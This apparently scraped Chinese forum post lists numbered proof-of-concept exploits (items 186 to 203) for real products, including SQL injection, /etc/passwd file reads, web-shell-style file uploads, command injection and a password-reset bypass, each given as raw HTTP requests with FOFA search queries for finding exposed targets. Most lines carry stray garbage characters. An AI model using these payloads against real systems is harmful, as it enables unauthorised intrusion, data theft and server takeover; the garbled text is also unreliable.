1 ~' O$ e( Q; _ @GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
* t3 G+ ^9 r O/ oHost: host8 g& _- k% s4 b8 _- V. `8 E
2 K! v7 r+ X4 x" ^
* k3 _) o+ ]" b* |1 W186. F-logic DataCube3 SQL注入8 _8 B- S# D. w3 y$ g; k4 q) R1 i
CVE-2024-31750
1 H O, a$ O! G5 u) D3 q6 LF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
4 k& o" U% i$ LFOFA:title=="DataCube3"
9 q0 t* }% ~+ y& P% |' Q; aPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1, t5 a, ]% Y' |4 F- P3 m, S. j
Host: your-ip2 Y& P9 V7 S* v2 \. u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
0 | S- W( l6 S% w5 c! W; J: BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
6 L2 `' d3 m: I @. f" i: xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 W% x" M7 h2 a) R% y p4 u1 `Accept-Encoding: gzip, deflate% J& i: ` r1 @9 l9 r, D
Connection: close
6 B5 H- S) X5 `) M5 yContent-Type: application/x-www-form-urlencoded, Y1 T$ ]* V( ~3 c/ Z1 S
9 f6 q5 e* P* k7 J2 s" L' I! Kreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450/ J q, O' A( ? f# N' A, S( a1 M! Y
, R; y; D+ O) w, ~% D# b
' z- X) _+ m* p6 ^4 l# m# c
187. Mura CMS processAsyncObject SQL注入
4 a" P, C+ }4 P) Q7 \; ICVE-2024-32640
0 m9 O9 y2 d9 u$ HFOFA:"Mura CMS"6 P) @$ h/ {0 r* b2 ~! |5 z% [
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
* q8 S7 E; D5 r( c; a! m( gHost: your-ip
: T* l7 D9 u, K' Q% s4 ~3 }Content-Type: application/x-www-form-urlencoded
( T. @% J ]; X( C k5 r) X% P: l( K
4 z1 p) v3 h g, U8 O6 |& Pobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
' X R( i0 k3 r
: u" |: Z8 ?7 a4 a! {3 f: h
5 C* J4 b2 I0 l( T: c; n3 N2 U188. 叁体-佳会视频会议 attachment 任意文件读取
6 H9 I: o m |version <= 3.9.7
/ Y6 r7 d' e" p0 q% i4 GFOFA:body="/system/get_rtc_user_defined_info?site_id"
& A; u! ~" C! e6 q$ K! D2 c" jGET /attachment?file=/etc/passwd HTTP/1.18 l0 w2 t5 g2 I" x% K
Host: your-ip
& m. A" t7 {8 W( I$ m) A) MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& o2 t$ G2 v! l& k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 u7 O4 @) |/ o1 @, z
Accept-Encoding: gzip, deflate
2 o& d* D. P1 x1 r: [Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
5 w& p! [ T% K3 fConnection: close( q, }3 n- n# h/ r% \0 Q) U
. f& Z( c: c2 j" |* P; s
2 o# [; |2 v4 g# V7 k; |189. 蓝网科技临床浏览系统 deleteStudy SQL注入
/ V+ u @ Y( ?( @1 L7 _$ eFOFA:app="LANWON-临床浏览系统"
' ^ t) L$ v: i" vGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
9 A6 D. ?' A. _! q* E+ M4 hHost: your-ip0 ?2 Z/ ?6 d9 ^/ S% o% s
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+ X3 K# y: B* s! m4 g% cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% F, h1 Y4 S, L0 C1 e1 G
Accept-Encoding: gzip, deflate& j2 m- i1 c4 ?8 N) s" U
Accept-Language: zh-CN,zh;q=0.9
2 Q/ q" N& J# h& P: ], T9 b6 C5 UConnection: close
% f) X* A' n5 D- y8 Z
' ?3 v" Z# X/ x3 c. [: ^. T1 z2 f
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
1 d1 M% H' _! Q8 f7 T5 K! |( V0 FFOFA:title=="短视频矩阵营销系统"
7 Q, A- }7 e# mPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
0 ]5 }3 c' J" n' |$ ^8 NHost: your-ip
8 w) o; @- L/ r8 U" k. kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
/ X# i7 `9 P F9 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
, d9 r1 |4 B6 a: W& oContent-Type: application/x-www-form-urlencoded% `: s: A( m; P9 [2 r
Accept-Encoding: gzip, deflate
" g" e: w5 y4 k$ L4 AAccept-Language: zh-CN,zh;q=0.9
0 Y7 T1 U, Y4 w3 U) [$ ~ j. _
poi=file:///etc/passwd
2 ?% m6 l. J- E& A" l" O' u
! {$ u1 ?) }1 t: m2 L; e' C) C1 b1 T+ t8 ^/ {/ b
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入9 \% b) a. D" I8 O7 J4 M: X
FOFA:body="/CDGServer3/index.jsp"
% h0 h e! y* e/ T/ X! VPOST /CDGServer3/js/../NavigationAjax HTTP/1.1! K' r- p6 A* a i4 M
Host: your-ip
; X) L, C8 Q0 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! N2 s( R# n# C
Content-Type: application/x-www-form-urlencoded
) x8 J; I2 ~1 ]/ A0 ^1 j: y% o% b' n$ M
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=1 s& U% D" {3 i& O' N
1 }$ @; z( a# T4 t* O Q
" Q8 t( Z. w; k' c; i8 x
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
9 X8 x% f, ?1 gFOFA:title="用户登录_富通天下外贸ERP"
; z5 u& ?4 T# D/ b( ^- W* PPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
6 E: q$ E8 G c7 ~Host: your-ip
. v9 F9 K0 x f7 f N$ n: L$ mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 E' C! l X U% O4 V- p) Z
Content-Type: application/x-www-form-urlencoded3 E8 ]* w& y4 x9 G: t O2 c
4 D/ t9 _8 A# q3 V: Y
" i3 s; S* Q5 a$ @
<% @ webhandler language="C#" class="AverageHandler" %>
% l2 ? S$ g' k( [; N' A( zusing System;( Y: `7 Z7 V2 j+ I
using System.Web;( K2 c. u5 `) _+ {- w7 h
public class AverageHandler : IHttpHandler- q9 W T( J: v4 d( I+ Y% x
{
; T3 L! E, N( A1 l# o* O6 \public bool IsReusable
8 ?1 ~0 @- w& J7 k9 B{ get { return true; } }# s$ {1 q- N- H5 K! q
public void ProcessRequest(HttpContext ctx)( R: o, d( k/ m
{0 t1 {( {! g! [: k' r/ ^
ctx.Response.Write("test");& _( U4 o' E/ l5 m& t0 f* U3 y
}
5 @1 F7 s4 J6 v+ G" \}" |" P- Z' j- Q' e- @, n
7 U- f/ _& d1 O# o6 ]( t& R( o5 i2 I) I& x! Q5 E* v6 s
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行+ E9 [2 R/ j n3 W
FOFA:body="山石云鉴主机安全管理系统"/ a/ u4 k$ n$ e0 S
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
* z9 a: `8 {2 e% y# BHost:* ?% P/ W% b; [# ~# q: w# y) D
Cookie: PHPSESSID=2333333333333;6 r5 v$ A, J% w
Content-Type: application/x-www-form-urlencoded
, e" |" `" h8 {/ w$ _5 LUser-Agent: Mozilla/5.0
- ] n5 h" Y5 I' r/ _0 [7 Q7 u5 t# }8 l% C) D) F4 P; O% K
% e- M, J, b- {' _
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
% j" [/ {- W1 Y( P, iHost:
) t" R0 D! r6 Y( x$ ~! }4 QUser-Agent: Mozilla/5.0
. P- T) `, G* S- k/ h' vAccept-Encoding: gzip, deflate
1 W7 X( Z( G ZAccept: */*
6 |! o1 r6 `5 ]% _. n# G* DConnection: close
5 \8 F* Z9 M: S5 C( A) SCookie: PHPSESSID=2333333333333;
0 O3 p* L4 ^" x. J2 I# b* J2 FContent-Type: application/x-www-form-urlencoded
) D S* D: b" d9 p. `Content-Length: 84 r5 m0 t( _: {' L. h% Y# V
: } ^9 b6 o$ @. |( S$ @- O
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
6 T O( v, k2 F; P" X0 D3 L
9 D. }9 Z G8 Q% a, M
) O0 T% m- v! IGET /master/img/config HTTP/1.1
C6 G) j1 V0 C# o6 F4 aHost:
: W2 M4 W1 W8 `6 R0 FUser-Agent: Mozilla/5.0
7 l% V/ j3 y+ N1 P; _
4 j @. }% a7 p. e8 e3 p" C' }, k* c& X1 G: I
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
. |& g& O; t, J! v8 E( bFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在9 w* I9 {7 n4 n" g) }
3 Y( B% d. U: r, ~4 l3 W
POST /servlet/uploadAttachmentServlet HTTP/1.1
3 N! y; h/ w* DHost: host
/ r4 Z* R* z- X8 \2 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36$ G" u6 k+ [6 \4 ~+ y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% W }7 o$ g% @0 C6 H' y' L) \; @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- w* C5 g0 `$ _* n& f6 h7 F. B" p. dAccept-Encoding: gzip, deflate' L% Y2 Y; ~. X+ O) G
Connection: close
% _6 g* Y) i! _Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
+ [/ ]& o9 s- B) [4 M8 n9 j------WebKitFormBoundaryKNt0t4vBe8cX9rZk; T/ p! b: u4 B2 F; Z
$ _/ @6 U: v& m. h/ F/ eContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"& b9 n8 a$ r7 S1 D. d& A" a
Content-Type: text/plain6 j0 {$ {% I- s. y- y
<% out.println("hello");%> a! P: T7 K3 h3 N ?4 @ ?4 _: i
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
& d1 o. y2 x% V8 A* `Content-Disposition: form-data; name="json"
/ ]' v% V S+ k) `+ U% y: c {"iq":{"query":{"UpdateType":"mail"}}}
6 p a) O, m0 ?; J# X0 }5 t. T ~------WebKitFormBoundaryKNt0t4vBe8cX9rZk--: l, n6 G: [/ d
# k& S3 D m. `9 B
8 J; ?" Z& k( k- O
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行; `8 `9 o1 P; v; s
FOFA:title=="飞鱼星企业级智能上网行为管理系统
! K- R9 f+ v0 H8 I* E, ?' x4 \1 p3 }/ LPOST /send_order.cgi?parameter=operation HTTP/1.1" ~! d G) _8 w* e+ e
Host: 127.0.0.1
* f/ P/ m9 z5 P& EPragma: no-cache T" |7 F' ^! w) A
Cache-Control: no-cache+ d2 Z. R6 F5 E- m9 e0 T9 }/ V* m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
0 l9 x6 K5 ?- s* O4 b- _Accept: */*9 [4 o2 v Y4 F: h9 {
Accept-Encoding: gzip, deflate
, E; v- A4 E! J. s" xAccept-Language: zh-CN,zh;q=0.9
: d7 R" c. v# p4 i9 RConnection: close# \' w5 ?5 o/ z$ B/ Q, B' O
Content-Type: application/x-www-form-urlencoded2 y( S" h. Q" D" _, r: w
Content-Length: 68 v& J- q% \5 q
0 B F. y! E/ }. n& Q# j
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}3 u3 o* R W% F0 l
% R; @& L" x3 O5 d/ X/ U2 [1 V) a, D! }) j0 T
196. 河南省风速科技统一认证平台密码重置
6 ^$ E8 R% C1 S9 kFOFA:body="/cas/themes/zbvc/js/jquery.min.js"/ g$ C5 E/ H, X+ k: v' D% A7 G
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
; o& i2 _7 k4 R$ PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# Q2 f# y7 Y8 ?' w' L/ [8 @ xContent-Type: application/json;charset=UTF-8
% ]6 ^" e! Z/ t7 ]" UX-Requested-With: XMLHttpRequest
& n" Q3 w" P! V" s6 J& MHost:
: V' @' I+ u7 g uAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2. Z& d) ]- h; e# I2 |5 Z
Content-Length: 45
( F! i* D0 z; oConnection: close
* o! ?0 W7 X" `: G Y! k
/ r H4 c. z, Z+ i3 \{"xgh":"test","newPass":"test666","email":""}+ a" |8 A6 k& d% H2 {' G
, U) R4 T" m! v3 |7 d$ U
* h3 f; x4 d, N; U, @) Z
7 K8 B [% E D7 k- X197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入5 K# S `2 P% e/ W+ M
FOFA:app="浙大恩特客户资源管理系统"4 Y& F6 L: l3 T, F- b8 E8 m
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
8 I5 B+ L, J- ?* l2 t6 y9 b' bHost:$ ^/ n2 Z( j3 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
f$ U+ X4 E: a; K$ G0 xAccept-Encoding: gzip, deflate. @% U7 z( h q& N5 _4 k
Connection: close
. n! R: Q5 y0 l; `/ o8 w$ o7 Q$ ^" u: ?7 {
$ r: g l/ s B G8 M+ b# Z9 F1 c+ s6 S; t
198. 阿里云盘 WebDAV 命令注入$ a8 x( E2 f9 P3 z
CVE-2024-296400 }( V6 D: [5 ^( F
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.14 P. b m7 o1 s8 I% \- j
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf648 K5 e, W2 \9 V8 n+ L) \& X, y% b# N
Accept: */*
3 ?$ ?. X( `( k9 j2 F! z$ Z- x1 E' n& pAccept-Encoding: gzip, deflate
U! r* x$ M3 v; o4 SAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
4 |# d0 M U' O: aConnection: close. d) I+ J; R/ O3 @$ k; f) o
* V" u: V3 @! w5 `2 e ?
! ` r0 N5 K& W199. cockpit系统assetsmanager_upload接口 文件上传
- U6 f; L: _9 q/ Z) r2 X# I' \! P" p
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
* w- q9 o+ F4 d. K& P( S8 YGET /auth/login?to=/ HTTP/1.1
/ H" ~0 |: G' T$ o z
! M: v O) E6 q5 C/ k响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw" n- V/ \+ f( t4 P9 P
0 d# M, x" P W
2.使用刚才上一步获取到的jwt获取cookie:$ Z& c% S4 `3 x2 H
9 p2 p$ I, o+ a% O T! h: x& O6 nPOST /auth/check HTTP/1.1$ c* [. m; e4 Z
Content-Type: application/json
6 n$ A' o9 f' y& _* C; s# N- Q& O& ]8 n8 `3 l8 D6 I& n
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}- X8 E$ P% D% D( |
2 u5 ?3 L8 }& l0 g9 }# H* x6 K. r' c
响应:200,返回值:* b: a! J; k) g5 `9 [/ C
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/+ x0 X2 J! l+ a; `
Fofa:title="Authenticate Please!", {# @8 {# y2 r; P5 `5 r
POST /assetsmanager/upload HTTP/1.1
8 e; j. u. u% }+ q6 V' Z+ Q+ t( pContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
5 \; X# S. _* h5 X+ f% yCookie: mysession=95524f01e238bf51bb60d77ede3bea925 i9 _% b! R7 G5 o
5 V$ o5 ~) ^9 u* Y' X8 ]
-----------------------------36D28FBc36bd6feE7Fb3) x. U7 e: |- { a
Content-Disposition: form-data; name="files[]"; filename="tttt.php"" A3 l, { b y; r
Content-Type: text/php
* L! C4 `! a+ H1 _
' ]% Y+ K$ s6 X- y: n, V<?php echo "tttt";unlink(__FILE__);?>
% m4 v/ n( f1 u& _1 \+ O8 X-----------------------------36D28FBc36bd6feE7Fb3
+ p- s4 w. P( O- @7 t) A# OContent-Disposition: form-data; name="folder"
: d- S* z+ m+ Z+ d3 _' H+ o) x6 N* p1 [
-----------------------------36D28FBc36bd6feE7Fb3--; q2 J9 w X* K6 x+ C$ U
% H) `9 E& B0 a/ ?+ `" Y$ a- B0 O$ x8 E% l e8 q
/storage/uploads/tttt.php* F3 L+ B# k- @: \3 s% Z U
/ N* R$ C5 o% d+ n3 |# ]& F& _200. SeaCMS海洋影视管理系统dmku SQL注入8 n5 u7 a( X3 n
FOFA:app="海洋CMS") R v; g% t4 i. Z3 ?2 w
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
" p* {$ p7 _ \2 o. J/ G. fCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
/ S' s* [) \: A% H2 s- E6 gUpgrade-Insecure-Requests: 12 Q/ c* C4 f6 o, ^# C/ C8 A4 z
Cache-Control: max-age=0
2 i1 R; O' k# U- j% l) nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 |& m8 {) Q! Q/ Y8 U
Accept-Encoding: gzip, deflate9 @) J( A7 }! y4 M5 R
Accept-Language: zh-CN,zh;q=0.9
) [3 h" Z3 ~" x$ E' X' v9 t$ u3 ~0 p7 v; D3 D3 R
1 g- l, ? K* G
201. 方正全媒体新闻采编系统 binary SQL注入, ^' E4 Y# _$ a% `: |* c- }
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
; R' E, `. P+ {% e, O, LPOST /newsedit/newsplan/task/binary.do HTTP/1.1$ t& u6 w7 Q8 C% Y0 L
Content-Type: application/x-www-form-urlencoded9 o! q8 _5 p$ R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, P& c, ^1 [$ u0 D
Accept-Encoding: gzip, deflate
1 l$ O1 m: K7 \4 M1 @, h3 M3 gAccept-Language: zh-CN,zh;q=0.94 ?0 S' Y" H2 Q* }, V8 }
Connection: close
; v' ^, b& V* M/ d8 k s
! K" z. l. Q* }% ?2 @; X& ]& OTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=19 l, E1 Y4 G) {6 s8 N1 g( |2 u
; l$ x8 _2 H" @4 x6 m
" ? ]7 ]% b$ s# z
202. 微擎系统 AccountEdit任意文件上传; s& O- B# t: w
FOFA:body="/Widgets/WidgetCollection/"
6 |5 z0 W% u9 ~0 P8 l0 H获取__VIEWSTATE和__EVENTVALIDATION值
; ^; `9 A1 e% s% ~, @; p, @GET /User/AccountEdit.aspx HTTP/1.19 q2 g4 w+ I f/ y% l) l: W! ?
Host: 滑板人之家$ L7 [8 I7 T* E0 E4 M. d! Q( |/ ?9 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31' ^8 G8 {7 u; w' J% m( O1 O4 d
Content-Length: 0
5 Y) x9 r. j7 g# V# n
5 i. y) I4 q. ~2 R
& K0 F+ f, P8 c& Q: G替换__VIEWSTATE和__EVENTVALIDATION值
/ F& ~0 X0 p7 J6 j4 NPOST /User/AccountEdit.aspx HTTP/1.1
% L- m2 a1 g G5 kAccept-Encoding: gzip, deflate, br9 D( M0 L) S) X% O- D! I; u/ ?
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687: }( K2 z. ?- J5 R
5 [9 X5 t9 n0 c4 X' u* F9 Q
-----------------------------786435874t38587593865736587346567358735687
% d' m& p h5 ?/ n4 RContent-Disposition: form-data; name="__VIEWSTATE"
8 s% M2 W( T7 H6 r8 n
. m5 w. M+ j- e3 X8 @) T% A$ r' `__VIEWSTATE
4 s L/ q4 i5 \5 k, m' P R-----------------------------786435874t38587593865736587346567358735687
% P/ n1 G" ?# g1 a5 }! r" gContent-Disposition: form-data; name="__EVENTVALIDATION"% `9 ^0 p7 @# N+ R
% Y" p1 j4 C, R5 w( w
__EVENTVALIDATION$ ^& h r' r9 D
-----------------------------786435874t38587593865736587346567358735687
& X4 |9 i5 A! W( ~. Y qContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"- N& d) O4 k( P7 ~
Content-Type: text/plain9 j' x. j; Q% u+ P
) w' V X+ B7 B! ?% `
Hello World!
6 t% [( Q. g; v9 X6 X-----------------------------786435874t38587593865736587346567358735687
6 k* f, L% m: f3 c0 U' {9 DContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
' m" p6 M8 E0 A) n/ ]/ J: R; l4 K& I8 _
上传图片# B; g% j2 U% d! H, O5 E
-----------------------------786435874t385875938657365873465673587356871 r. D8 C/ v9 F0 P3 ^
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"8 L4 k7 ~. d, q8 |
& \) W/ k1 L$ i3 z ], I. H, `* `7 f* i) M w4 ~9 X) G
-----------------------------786435874t38587593865736587346567358735687
& x/ @2 U' r, I, p. OContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"# j7 ?" \! c+ q: @ v
& g/ O' M5 F' p) g% v' \' I2 t9 j( [% T6 E3 v9 ~# m" l" u( G# l! p4 y
-----------------------------786435874t38587593865736587346567358735687--
; W/ b! m0 I, a8 \. Z0 ~- D4 P6 W# G5 N/ k% o
8 t# p9 ~$ x: L6 z6 ?/_data/Uploads/1123.txt
. q/ Y8 O; G8 b4 O6 b' j F1 [6 ?% C { s) S' X" A# {
203. 红海云EHR PtFjk 文件上传
* Z( p* e d3 O, T; E& c# T& mFOFA:body="RedseaPlatform"
; i1 h3 ^" l8 J4 G6 L; JPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.15 v# K5 l1 f/ A$ f: Y
Host: x.x.x.x" k- Y2 Q9 L6 Q& Z; M, S
Accept-Encoding: gzip% n7 g* T$ c I) B" ?+ J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 a' E6 X0 V8 qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
) X2 t/ R& \; j6 TContent-Length: 210
2 U1 I2 w1 B9 b
3 c2 z7 H0 [0 I4 ?$ r% D/ l------WebKitFormBoundaryt7WbDl1tXogoZys4
0 s5 v# e O0 N7 uContent-Disposition: form-data; name="fj_file"; filename="11.jsp"4 t. w2 P- L: \4 k O
Content-Type:image/jpeg5 u4 |4 P3 A( A
0 }+ W+ f5 D( c
<% out.print("hello,eHR");%>
! |: ?# Z) D5 g9 E, e& x; [- o------WebKitFormBoundaryt7WbDl1tXogoZys4--
; ?/ Q7 d n6 Y, z) f2 ]3 X
7 ^3 j* I1 z, H$ g. X' q: u 0 I9 H3 R% R- n- S* M/ y/ B
/ I C) A' _& a3 S6 f
; P/ `2 | H, u$ h1 P# {' P
& |7 A0 {$ p( {5 _" h. T% C2 d k: U' F
|
发表于 2024-6-5 14:31:29
收藏
支持
反对